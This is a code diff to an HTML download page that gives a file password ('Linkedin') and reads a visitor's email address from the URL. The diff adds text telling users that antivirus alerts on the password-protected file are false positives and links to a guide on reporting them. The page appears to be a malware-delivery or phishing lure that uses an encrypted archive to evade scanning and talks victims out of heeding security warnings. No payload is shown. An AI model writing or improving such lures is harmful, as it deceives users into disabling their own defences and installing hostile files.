--- a/index.html
+++ b/index.html
@@ -2,7 +2,12 @@
 
 <center><h2>Unlock your download by entering the File Password:<b> Linkedin <p>Then click on the "Download Protected File" to get instant access to your content!</h2>
 <div style="font-size:16pt; color:green;" align="center"><b>File Password: </b> Linkedin </b> </div>
+<p>
+Your Antivirus software may shows a false alert on a password-protected document, you can use the following article that explains how to send a report about a false positive issue to your Antivirus company:
+<br>
+<a href="https://www.av-comparatives.org/dealing-with-false-positives-reporting-issues-to-antivirus-vendors/">Dealing with False Positives: Reporting Issues to Antivirus Vendors</a>
 
+</p>
 
 <script>const urlParams = new URLSearchParams(window.location.search);
 const id = urlParams.get('email');
